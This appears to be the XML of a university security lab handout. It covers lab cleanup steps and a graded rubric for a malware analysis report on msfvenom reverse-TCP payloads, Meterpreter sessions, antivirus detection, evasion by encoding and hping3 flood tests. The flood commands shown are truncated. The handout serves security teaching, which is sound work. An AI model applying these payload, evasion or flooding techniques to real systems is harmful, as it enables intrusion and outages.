    <w:p w14:paraId="48D1814D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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 protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285A4097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3F912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96C9DA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Exercise 7: Clean Up and System Restoration (10 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E7C284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Stop All Malicious Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441E0F0E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VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50346267" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Task Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AFECDA" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Kill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payload1.exe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any meterpreter processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1E1C18" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Check for persistence: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A28A7B3" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Run keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B655EB" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Scheduled tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420AF4AF" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3959AF0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Restore from Snapshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409C3DAA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each VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F67D59" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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off VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3389F6" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Restore snapshot: "Clean_Week3_Lab"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374078E9" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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 on and verify clean state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6B549E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Re-enable Security Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139A004D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Windows VM (if not restoring snapshot):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160A47B7" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Re-enable Windows Defender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236E04BC" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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virus definitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB85E30" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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full system scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120232A1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Save Lab Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D0022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Ensure you have saved:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDB1AA6" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Monitor logs (PML and CSV)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139A4DB7" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A41F41" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304FB5D0" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Network captures (if using Wireshark)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFEC50D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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and observations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DA716B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0B0A9A2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B3DECB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Post-Lab Assignment: Malware Analysis Report (5%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AEEFF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Assignment Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F38952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Objective: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your malware analysis findings in a professional security report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BE921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Submission Deadline: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 of Week 4 (30 Nov 2025)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PDF document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Length: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8-12 pages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Weightage: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5% of total grade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F87565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468A09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3BC7E22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Report Structure and Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413F9B0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Executive Summary (1 page) - 10 points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402BD3C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6C6870E0" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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overview of lab objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBF3DAD" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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of key findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAE233D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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security implications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8AABB6" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Recommendations (2-3 key points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EA22B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Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32425F6F" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Written for non-technical audience</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3753EB88" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 and clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297FA1D1" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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critical findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206F8780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CE59A8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1ADF24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Lab Environment Setup (1 page) - 10 points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39351B5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45658D7A" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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topology diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F14AC0" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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VM configurations (IPs, OS versions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACD81E4" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Tools used (with versions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FCCF02" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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measures implemented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159E6EF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Include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A14FC6F" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Network diagram (can be simple)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12251953" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 of VM specifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34494751" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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 network configuration verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A41B0CF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3F66B0AB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4528F2D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Malware Analysis Section (4-5 pages) - 40 points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF9869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 Payload Generation (10 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC155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Document:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BB419C" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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msfvenom commands used (all 4 variants)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD0CE72" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Payload specifications (size, encoding, architecture)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548CBDE9" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Comparison table of different payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365E6CF6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Required table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334"/>
        <w:gridCol w:w="801"/>
        <w:gridCol w:w="1034"/>
        <w:gridCol w:w="1366"/>
        <w:gridCol w:w="1322"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="000AB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6E09F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Payload Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="546429FF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1AC0D9B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092B159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Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76AA8C74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07DB3847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C34A87" w:rsidRPr="00C34A87" w14:paraId="4732F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B69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payload1.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A19A6A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Reverse TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="651C25B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73KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03DEF84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BE6A03F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x86</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="799E411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test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="45158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AFD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payload_x64.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3C303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Reverse TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4313592B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XX KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5850ABB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9D7CD24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x64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56E5B31F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64-bit test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="362B4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FA6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etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F65E3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892AF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41138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97E44F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1E8D9B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34E28BF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 Behavioral Analysis (15 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72218AD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with screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD7D504" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Monitor output analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7213A070" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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system modifications (with paths)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FEEC69" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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changes (with keys)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC05E92" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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connections established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F8EC92" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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Persistence mechanisms discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6598553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Include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200AC17B" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Annotated Process Monitor screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AD47A0" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 of malware execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA1AAF4" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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of each behavioral category</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2826B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 Meterpreter Interaction (10 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5561E65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Document:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD6EDE" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Commands executed in Meterpreter session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F231265" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 of each command (with screenshots)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8554B4" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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exfiltration capabilities demonstrated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490F5714" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Privilege level achieved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8C845D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Persistence mechanisms tested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BEC56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3.4 Cleanup and Indicators of Compromise (IoCs) (5 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A8676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 all IoCs discovered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719473FF" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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paths of dropped files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6732EEB4" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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keys created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FC4CFA" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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indicators (IP:Port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1521E7A4" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C049BB" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Behavioral indicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD96BE3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 as IoC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253"/>
        <w:gridCol w:w="2308"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="24119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CE550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14:paraId="0CC62607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8AD869A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C34A87" w:rsidRPr="00C34A87" w14:paraId="472E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CCA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C20E5A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C:\Temp\payload1.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5515FA4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Malicious executable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="7426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CA77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07707F6F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HKLM...\Run[name]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01D56F97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Persistence mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="609E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DE49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D054DB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192.168.100.10:4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F8446D8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C2 connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F2B8FB8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19478C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535615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Antivirus Detection Testing (2 pages) - 20 points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE3CB6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4.1 Detection Results (10 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFEF9E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907"/>
        <w:gridCol w:w="1726"/>
        <w:gridCol w:w="1563"/>
        <w:gridCol w:w="1682"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="19294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4B68D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219C378F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Windows Defender</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="010C3801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VirusTotal Ratio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CCD23AD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Detection Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74DE8F38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Threat Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="151A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C2C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payload1.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34A0A8A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Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1271F0A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45/70</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3829C0B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34D2C6A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Trojan:Win32/...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="5F26D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763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payload_encoded.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55701ED9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Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="495C5DFF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12/70</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="778EE07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F4542F7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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7028CDB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Include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68689881" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 Windows Defender alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAF8188" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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VirusTotal scan results (screenshots)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B08EAC3" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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Analysis of detection patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0023291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4.2 Evasion Techniques Analysis (10 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEB05B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Discuss:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5646C1C0" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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encoding reduced detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383D889" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Limitations of signature-based detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2416EE4A" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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behavioral analysis could detect it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC063BA" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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evasion techniques researched</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BE9E0D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7EAFA6F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CC23D81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DoS Attack Analysis (2 pages) - 15 points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BE3D1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5.1 Attack Documentation (10 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273AF3FA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 each attack type (SYN flood, ICMP flood, HTTP flood):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAE7605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results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707"/>
        <w:gridCol w:w="994"/>
        <w:gridCol w:w="1934"/>
        <w:gridCol w:w="1547"/>
        <w:gridCol w:w="1429"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="7D8277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25A23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Attack Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0278ACA9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Command Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A848EDB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A6961FE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Baseline Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37E13679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During Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55F39AB2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Impact Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="1EB5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E0B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SYN Flood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ECE5F18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hping3 -S...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E22EA8B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60 sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C8CB3A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50ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD41F39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30BEB1B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</w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="74E3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B6E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ICMP Flood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25BA7CEA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hping3 --icmp...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E56D62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30 sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64636CE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45ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55553A1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500ms+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
